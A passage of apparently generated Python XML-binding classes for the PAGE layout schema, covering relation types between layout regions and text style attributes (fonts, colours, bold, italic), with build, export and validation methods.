outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='RelationsType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='RelationsType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RelationsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Relation_ in self.Relation:
namespaceprefix_ = self.Relation_nsprefix_ + ':' if (UseCapturedNS_ and self.Relation_nsprefix_) else ''
Relation_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Relation', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this object from the ElementTree *node* and return self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            # Strip the namespace from the child tag before dispatching.
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # RelationsType declares no XML attributes, so there is nothing to parse.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Build one child element of this node and append it to Relation."""
        if nodeName_ == 'Relation':
            obj_ = RelationType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Relation.append(obj_)
            obj_.original_tagname_ = 'Relation'
# end class RelationsType
class RelationType(GeneratedsSuper):
    """One-to-one relation between two layout objects.

    Use 'link' for loose relations and 'join' for strong relations
    (where something is fragmented, for instance).
    Examples for 'link': caption - image; floating - paragraph;
    paragraph - paragraph (when a paragraph is split across columns and
    the last word of the first paragraph DOES NOT continue in the second
    paragraph); drop-cap - paragraph (when the drop-cap is a whole word).
    Examples for 'join': word - word (separated word at the end of a
    line); drop-cap - paragraph (when the drop-cap is not a whole word);
    paragraph - paragraph (when a paragraph is split across columns and
    the last word of the first paragraph DOES continue in the second
    paragraph).
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
        MemberSpec_('type_', 'typeType1', 0, 1, {'use': 'optional'}),
        MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
        MemberSpec_('SourceRegionRef', 'RegionRefType', 0, 0, {'maxOccurs': '1', 'minOccurs': '1', 'name': 'SourceRegionRef', 'type': 'RegionRefType'}, None),
        MemberSpec_('TargetRegionRef', 'RegionRefType', 0, 0, {'maxOccurs': '1', 'minOccurs': '1', 'name': 'TargetRegionRef', 'type': 'RegionRefType'}, None),
    ]
    subclass = None
    superclass = None
    def __init__(self, id=None, type_=None, custom=None, comments=None, Labels=None, SourceRegionRef=None, TargetRegionRef=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.id = _cast(None, id)
        self.id_nsprefix_ = None
        self.type_ = _cast(None, type_)
        self.type__nsprefix_ = None
        self.custom = _cast(None, custom)
        self.custom_nsprefix_ = None
        self.comments = _cast(None, comments)
        self.comments_nsprefix_ = None
        # Mutable default handled safely: each instance gets its own list.
        if Labels is None:
            self.Labels = []
        else:
            self.Labels = Labels
        self.Labels_nsprefix_ = "pc"
        self.SourceRegionRef = SourceRegionRef
        self.SourceRegionRef_nsprefix_ = "pc"
        self.TargetRegionRef = TargetRegionRef
        self.TargetRegionRef_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        """Create an instance, honoring any registered subclass module."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, RelationType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if RelationType.subclass:
            return RelationType.subclass(*args_, **kwargs_)
        else:
            return RelationType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_Labels(self):
        return self.Labels
    def set_Labels(self, Labels):
        self.Labels = Labels
    def add_Labels(self, value):
        self.Labels.append(value)
    def insert_Labels_at(self, index, value):
        self.Labels.insert(index, value)
    def replace_Labels_at(self, index, value):
        self.Labels[index] = value
    def get_SourceRegionRef(self):
        return self.SourceRegionRef
    def set_SourceRegionRef(self, SourceRegionRef):
        self.SourceRegionRef = SourceRegionRef
    def get_TargetRegionRef(self):
        return self.TargetRegionRef
    def set_TargetRegionRef(self, TargetRegionRef):
        self.TargetRegionRef = TargetRegionRef
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_type(self):
        return self.type_
    def set_type(self, type_):
        self.type_ = type_
    def get_custom(self):
        return self.custom
    def set_custom(self, custom):
        self.custom = custom
    def get_comments(self):
        return self.comments
    def set_comments(self, comments):
        self.comments = comments
    def validate_typeType1(self, value):
        """Validate *value* against typeType1 (enumeration: link, join).

        Returns True when the value is valid (or validation is disabled),
        False otherwise.  Previously the enum-failure path assigned a dead
        local and fell through returning None; now the result is returned
        consistently on every path.
        """
        result = True
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            enumerations = ['link', 'join']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on typeType1' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                result = False
        return result
    def hasContent_(self):
        """Report whether this element has any child content to serialize."""
        if (
            self.Labels or
            self.SourceRegionRef is not None or
            self.TargetRegionRef is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RelationType', pretty_print=True):
        """Serialize this element and its children as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('RelationType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'RelationType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='RelationType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='RelationType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='RelationType'):
        """Write this element's XML attributes to *outfile*."""
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
        if self.custom is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
        if self.comments is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RelationType', fromsubclass_=False, pretty_print=True):
        """Write the child elements (Labels, Source/TargetRegionRef)."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for Labels_ in self.Labels:
            namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
            Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
        if self.SourceRegionRef is not None:
            namespaceprefix_ = self.SourceRegionRef_nsprefix_ + ':' if (UseCapturedNS_ and self.SourceRegionRef_nsprefix_) else ''
            self.SourceRegionRef.export(outfile, level, namespaceprefix_, namespacedef_='', name_='SourceRegionRef', pretty_print=pretty_print)
        if self.TargetRegionRef is not None:
            namespaceprefix_ = self.TargetRegionRef_nsprefix_ + ':' if (UseCapturedNS_ and self.TargetRegionRef_nsprefix_) else ''
            self.TargetRegionRef.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TargetRegionRef', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this object from the ElementTree *node* and return self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse this element's XML attributes from *node*."""
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
        value = find_attr_value_('type', node)
        if value is not None and 'type' not in already_processed:
            already_processed.add('type')
            self.type_ = value
            self.validate_typeType1(self.type_) # validate type typeType1
        value = find_attr_value_('custom', node)
        if value is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            self.custom = value
        value = find_attr_value_('comments', node)
        if value is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            self.comments = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Build one child element of this node and attach it."""
        if nodeName_ == 'Labels':
            obj_ = LabelsType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Labels.append(obj_)
            obj_.original_tagname_ = 'Labels'
        elif nodeName_ == 'SourceRegionRef':
            obj_ = RegionRefType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.SourceRegionRef = obj_
            obj_.original_tagname_ = 'SourceRegionRef'
        elif nodeName_ == 'TargetRegionRef':
            obj_ = RegionRefType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.TargetRegionRef = obj_
            obj_.original_tagname_ = 'TargetRegionRef'
# end class RelationType
class TextStyleType(GeneratedsSuper):
    """Text style properties of a region, line, word or glyph.

    Covers font family (e.g. Arial, Times New Roman; add more
    information such as blackletter/antiqua if necessary), serif vs
    sans-serif and monospace vs proportional typefaces, font size in
    points, x-height (corpus size, in pixels) measured from baseline to
    mean line of lower-case letters, kerning (space in points between
    characters), text and background colours (as a named colour or RGB
    encoded as red + 256*green + 65536*blue), reverse video (colour of
    the text reversed against the background), and the usual character
    styling flags (bold, italic, underlined plus underline line style,
    subscript, superscript, strikethrough, small caps, letter spacing).
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('fontFamily', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('serif', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('monospace', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('fontSize', 'float', 0, 1, {'use': 'optional'}),
        MemberSpec_('xHeight', 'integer', 0, 1, {'use': 'optional'}),
        MemberSpec_('kerning', 'int', 0, 1, {'use': 'optional'}),
        MemberSpec_('textColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('textColourRgb', 'integer', 0, 1, {'use': 'optional'}),
        MemberSpec_('bgColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('bgColourRgb', 'integer', 0, 1, {'use': 'optional'}),
        MemberSpec_('reverseVideo', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('bold', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('italic', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('underlined', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('underlineStyle', 'pc:UnderlineStyleSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('subscript', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('superscript', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('strikethrough', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('smallCaps', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('letterSpaced', 'boolean', 0, 1, {'use': 'optional'}),
    ]
    subclass = None
    superclass = None
    def __init__(self, fontFamily=None, serif=None, monospace=None, fontSize=None, xHeight=None, kerning=None, textColour=None, textColourRgb=None, bgColour=None, bgColourRgb=None, reverseVideo=None, bold=None, italic=None, underlined=None, underlineStyle=None, subscript=None, superscript=None, strikethrough=None, smallCaps=None, letterSpaced=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.fontFamily = _cast(None, fontFamily)
        self.fontFamily_nsprefix_ = None
        self.serif = _cast(bool, serif)
        self.serif_nsprefix_ = None
        self.monospace = _cast(bool, monospace)
        self.monospace_nsprefix_ = None
        self.fontSize = _cast(float, fontSize)
        self.fontSize_nsprefix_ = None
        self.xHeight = _cast(int, xHeight)
        self.xHeight_nsprefix_ = None
        self.kerning = _cast(int, kerning)
        self.kerning_nsprefix_ = None
        self.textColour = _cast(None, textColour)
        self.textColour_nsprefix_ = None
        self.textColourRgb = _cast(int, textColourRgb)
        self.textColourRgb_nsprefix_ = None
        self.bgColour = _cast(None, bgColour)
        self.bgColour_nsprefix_ = None
        self.bgColourRgb = _cast(int, bgColourRgb)
        self.bgColourRgb_nsprefix_ = None
        self.reverseVideo = _cast(bool, reverseVideo)
        self.reverseVideo_nsprefix_ = None
        self.bold = _cast(bool, bold)
        self.bold_nsprefix_ = None
        self.italic = _cast(bool, italic)
        self.italic_nsprefix_ = None
        self.underlined = _cast(bool, underlined)
        self.underlined_nsprefix_ = None
        self.underlineStyle = _cast(None, underlineStyle)
        self.underlineStyle_nsprefix_ = None
        self.subscript = _cast(bool, subscript)
        self.subscript_nsprefix_ = None
        self.superscript = _cast(bool, superscript)
        self.superscript_nsprefix_ = None
        self.strikethrough = _cast(bool, strikethrough)
        self.strikethrough_nsprefix_ = None
        self.smallCaps = _cast(bool, smallCaps)
        self.smallCaps_nsprefix_ = None
        self.letterSpaced = _cast(bool, letterSpaced)
        self.letterSpaced_nsprefix_ = None
    def factory(*args_, **kwargs_):
        """Create an instance, honoring any registered subclass module."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, TextStyleType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if TextStyleType.subclass:
            return TextStyleType.subclass(*args_, **kwargs_)
        else:
            return TextStyleType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_fontFamily(self):
        return self.fontFamily
    def set_fontFamily(self, fontFamily):
        self.fontFamily = fontFamily
    def get_serif(self):
        return self.serif
    def set_serif(self, serif):
        self.serif = serif
    def get_monospace(self):
        return self.monospace
    def set_monospace(self, monospace):
        self.monospace = monospace
    def get_fontSize(self):
        return self.fontSize
    def set_fontSize(self, fontSize):
        self.fontSize = fontSize
    def get_xHeight(self):
        return self.xHeight
    def set_xHeight(self, xHeight):
        self.xHeight = xHeight
    def get_kerning(self):
        return self.kerning
    def set_kerning(self, kerning):
        self.kerning = kerning
    def get_textColour(self):
        return self.textColour
    def set_textColour(self, textColour):
        self.textColour = textColour
    def get_textColourRgb(self):
        return self.textColourRgb
    def set_textColourRgb(self, textColourRgb):
        self.textColourRgb = textColourRgb
    def get_bgColour(self):
        return self.bgColour
    def set_bgColour(self, bgColour):
        self.bgColour = bgColour
    def get_bgColourRgb(self):
        return self.bgColourRgb
    def set_bgColourRgb(self, bgColourRgb):
        self.bgColourRgb = bgColourRgb
    def get_reverseVideo(self):
        return self.reverseVideo
    def set_reverseVideo(self, reverseVideo):
        self.reverseVideo = reverseVideo
    def get_bold(self):
        return self.bold
    def set_bold(self, bold):
        self.bold = bold
    def get_italic(self):
        return self.italic
    def set_italic(self, italic):
        self.italic = italic
    def get_underlined(self):
        return self.underlined
    def set_underlined(self, underlined):
        self.underlined = underlined
    def get_underlineStyle(self):
        return self.underlineStyle
    def set_underlineStyle(self, underlineStyle):
        self.underlineStyle = underlineStyle
    def get_subscript(self):
        return self.subscript
    def set_subscript(self, subscript):
        self.subscript = subscript
    def get_superscript(self):
        return self.superscript
    def set_superscript(self, superscript):
        self.superscript = superscript
    def get_strikethrough(self):
        return self.strikethrough
    def set_strikethrough(self, strikethrough):
        self.strikethrough = strikethrough
    def get_smallCaps(self):
        return self.smallCaps
    def set_smallCaps(self, smallCaps):
        self.smallCaps = smallCaps
    def get_letterSpaced(self):
        return self.letterSpaced
    def set_letterSpaced(self, letterSpaced):
        self.letterSpaced = letterSpaced
    def validate_ColourSimpleType(self, value):
        """Validate *value* against pc:ColourSimpleType (named colours).

        Returns True when the value is valid (or validation is disabled),
        False otherwise.  Previously the enum-failure path assigned a dead
        local and fell through returning None; now the result is returned
        consistently on every path.
        """
        result = True
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                result = False
        return result
    def validate_UnderlineStyleSimpleType(self, value):
        """Validate *value* against pc:UnderlineStyleSimpleType.

        Returns True when the value is valid (or validation is disabled),
        False otherwise (same fix as validate_ColourSimpleType).
        """
        result = True
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            enumerations = ['singleLine', 'doubleLine', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on UnderlineStyleSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                result = False
        return result
    def hasContent_(self):
        """Report whether this element has child content to serialize.

        TextStyleType is attribute-only (no child elements), so this is
        always False; the generated original expressed this as an empty
        tuple condition ``if ():``.
        """
        return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TextStyleType', pretty_print=True):
        """Serialize this element as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('TextStyleType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'TextStyleType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='TextStyleType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='TextStyleType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # Attribute-only element: always self-closing.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='TextStyleType'):
        """Write all non-None style attributes to *outfile*."""
        if self.fontFamily is not None and 'fontFamily' not in already_processed:
            already_processed.add('fontFamily')
            outfile.write(' fontFamily=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.fontFamily), input_name='fontFamily')), ))
        if self.serif is not None and 'serif' not in already_processed:
            already_processed.add('serif')
            outfile.write(' serif="%s"' % self.gds_format_boolean(self.serif, input_name='serif'))
        if self.monospace is not None and 'monospace' not in already_processed:
            already_processed.add('monospace')
            outfile.write(' monospace="%s"' % self.gds_format_boolean(self.monospace, input_name='monospace'))
        if self.fontSize is not None and 'fontSize' not in already_processed:
            already_processed.add('fontSize')
            outfile.write(' fontSize="%s"' % self.gds_format_float(self.fontSize, input_name='fontSize'))
        if self.xHeight is not None and 'xHeight' not in already_processed:
            already_processed.add('xHeight')
            outfile.write(' xHeight="%s"' % self.gds_format_integer(self.xHeight, input_name='xHeight'))
        if self.kerning is not None and 'kerning' not in already_processed:
            already_processed.add('kerning')
            outfile.write(' kerning="%s"' % self.gds_format_integer(self.kerning, input_name='kerning'))
        if self.textColour is not None and 'textColour' not in already_processed:
            already_processed.add('textColour')
            outfile.write(' textColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.textColour), input_name='textColour')), ))
        if self.textColourRgb is not None and 'textColourRgb' not in already_processed:
            already_processed.add('textColourRgb')
            outfile.write(' textColourRgb="%s"' % self.gds_format_integer(self.textColourRgb, input_name='textColourRgb'))
        if self.bgColour is not None and 'bgColour' not in already_processed:
            already_processed.add('bgColour')
            outfile.write(' bgColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.bgColour), input_name='bgColour')), ))
        if self.bgColourRgb is not None and 'bgColourRgb' not in already_processed:
            already_processed.add('bgColourRgb')
            outfile.write(' bgColourRgb="%s"' % self.gds_format_integer(self.bgColourRgb, input_name='bgColourRgb'))
        if self.reverseVideo is not None and 'reverseVideo' not in already_processed:
            already_processed.add('reverseVideo')
            outfile.write(' reverseVideo="%s"' % self.gds_format_boolean(self.reverseVideo, input_name='reverseVideo'))
        if self.bold is not None and 'bold' not in already_processed:
            already_processed.add('bold')
            outfile.write(' bold="%s"' % self.gds_format_boolean(self.bold, input_name='bold'))
        if self.italic is not None and 'italic' not in already_processed:
            already_processed.add('italic')
            outfile.write(' italic="%s"' % self.gds_format_boolean(self.italic, input_name='italic'))
        if self.underlined is not None and 'underlined' not in already_processed:
            already_processed.add('underlined')
            outfile.write(' underlined="%s"' % self.gds_format_boolean(self.underlined, input_name='underlined'))
        if self.underlineStyle is not None and 'underlineStyle' not in already_processed:
            already_processed.add('underlineStyle')
            outfile.write(' underlineStyle=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.underlineStyle), input_name='underlineStyle')), ))
        if self.subscript is not None and 'subscript' not in already_processed:
            already_processed.add('subscript')
            outfile.write(' subscript="%s"' % self.gds_format_boolean(self.subscript, input_name='subscript'))
        if self.superscript is not None and 'superscript' not in already_processed:
            already_processed.add('superscript')
            outfile.write(' superscript="%s"' % self.gds_format_boolean(self.superscript, input_name='superscript'))
        if self.strikethrough is not None and 'strikethrough' not in already_processed:
            already_processed.add('strikethrough')
            outfile.write(' strikethrough="%s"' % self.gds_format_boolean(self.strikethrough, input_name='strikethrough'))
        if self.smallCaps is not None and 'smallCaps' not in already_processed:
            already_processed.add('smallCaps')
            outfile.write(' smallCaps="%s"' % self.gds_format_boolean(self.smallCaps, input_name='smallCaps'))
        if self.letterSpaced is not None and 'letterSpaced' not in already_processed:
            already_processed.add('letterSpaced')
            outfile.write(' letterSpaced="%s"' % self.gds_format_boolean(self.letterSpaced, input_name='letterSpaced'))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TextStyleType', fromsubclass_=False, pretty_print=True):
        # Attribute-only element: nothing to export.
        pass
    def build(self, node, gds_collector_=None):
        """Populate this object from the ElementTree *node* and return self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def _parse_bool_(self, node, value):
        """Convert an xsd:boolean attribute string to a Python bool.

        Accepts 'true'/'1' and 'false'/'0'; raises a parse error for any
        other value.  Factored out of buildAttributes, which previously
        repeated this branch verbatim for each of the 11 boolean
        attributes.
        """
        if value in ('true', '1'):
            return True
        if value in ('false', '0'):
            return False
        raise_parse_error(node, 'Bad boolean attribute')
    def buildAttributes(self, node, attrs, already_processed):
        """Parse this element's XML attributes from *node*."""
        value = find_attr_value_('fontFamily', node)
        if value is not None and 'fontFamily' not in already_processed:
            already_processed.add('fontFamily')
            self.fontFamily = value
        value = find_attr_value_('serif', node)
        if value is not None and 'serif' not in already_processed:
            already_processed.add('serif')
            self.serif = self._parse_bool_(node, value)
        value = find_attr_value_('monospace', node)
        if value is not None and 'monospace' not in already_processed:
            already_processed.add('monospace')
            self.monospace = self._parse_bool_(node, value)
        value = find_attr_value_('fontSize', node)
        if value is not None and 'fontSize' not in already_processed:
            already_processed.add('fontSize')
            value = self.gds_parse_float(value, node, 'fontSize')
            self.fontSize = value
        value = find_attr_value_('xHeight', node)
        if value is not None and 'xHeight' not in already_processed:
            already_processed.add('xHeight')
            self.xHeight = self.gds_parse_integer(value, node, 'xHeight')
        value = find_attr_value_('kerning', node)
        if value is not None and 'kerning' not in already_processed:
            already_processed.add('kerning')
            self.kerning = self.gds_parse_integer(value, node, 'kerning')
        value = find_attr_value_('textColour', node)
        if value is not None and 'textColour' not in already_processed:
            already_processed.add('textColour')
            self.textColour = value
            self.validate_ColourSimpleType(self.textColour) # validate type ColourSimpleType
        value = find_attr_value_('textColourRgb', node)
        if value is not None and 'textColourRgb' not in already_processed:
            already_processed.add('textColourRgb')
            self.textColourRgb = self.gds_parse_integer(value, node, 'textColourRgb')
        value = find_attr_value_('bgColour', node)
        if value is not None and 'bgColour' not in already_processed:
            already_processed.add('bgColour')
            self.bgColour = value
            self.validate_ColourSimpleType(self.bgColour) # validate type ColourSimpleType
        value = find_attr_value_('bgColourRgb', node)
        if value is not None and 'bgColourRgb' not in already_processed:
            already_processed.add('bgColourRgb')
            self.bgColourRgb = self.gds_parse_integer(value, node, 'bgColourRgb')
        value = find_attr_value_('reverseVideo', node)
        if value is not None and 'reverseVideo' not in already_processed:
            already_processed.add('reverseVideo')
            self.reverseVideo = self._parse_bool_(node, value)
        value = find_attr_value_('bold', node)
        if value is not None and 'bold' not in already_processed:
            already_processed.add('bold')
            self.bold = self._parse_bool_(node, value)
        value = find_attr_value_('italic', node)
        if value is not None and 'italic' not in already_processed:
            already_processed.add('italic')
            self.italic = self._parse_bool_(node, value)
        value = find_attr_value_('underlined', node)
        if value is not None and 'underlined' not in already_processed:
            already_processed.add('underlined')
            self.underlined = self._parse_bool_(node, value)
        value = find_attr_value_('underlineStyle', node)
        if value is not None and 'underlineStyle' not in already_processed:
            already_processed.add('underlineStyle')
            self.underlineStyle = value
            self.validate_UnderlineStyleSimpleType(self.underlineStyle) # validate type UnderlineStyleSimpleType
        value = find_attr_value_('subscript', node)
        if value is not None and 'subscript' not in already_processed:
            already_processed.add('subscript')
            self.subscript = self._parse_bool_(node, value)
        value = find_attr_value_('superscript', node)
        if value is not None and 'superscript' not in already_processed:
            already_processed.add('superscript')
            self.superscript = self._parse_bool_(node, value)
        value = find_attr_value_('strikethrough', node)
        if value is not None and 'strikethrough' not in already_processed:
            already_processed.add('strikethrough')
            self.strikethrough = self._parse_bool_(node, value)
        value = find_attr_value_('smallCaps', node)
        if value is not None and 'smallCaps' not in already_processed:
            already_processed.add('smallCaps')
            self.smallCaps = self._parse_bool_(node, value)
        value = find_attr_value_('letterSpaced', node)
        if value is not None and 'letterSpaced' not in already_processed:
            already_processed.add('letterSpaced')
            self.letterSpaced = self._parse_bool_(node, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # Attribute-only element: no child elements to build.
        pass
# end class TextStyleType
class RegionType(GeneratedsSuper):
"""For generic use
Is this region a continuation of another region
(in previous column or page, for example)?"""
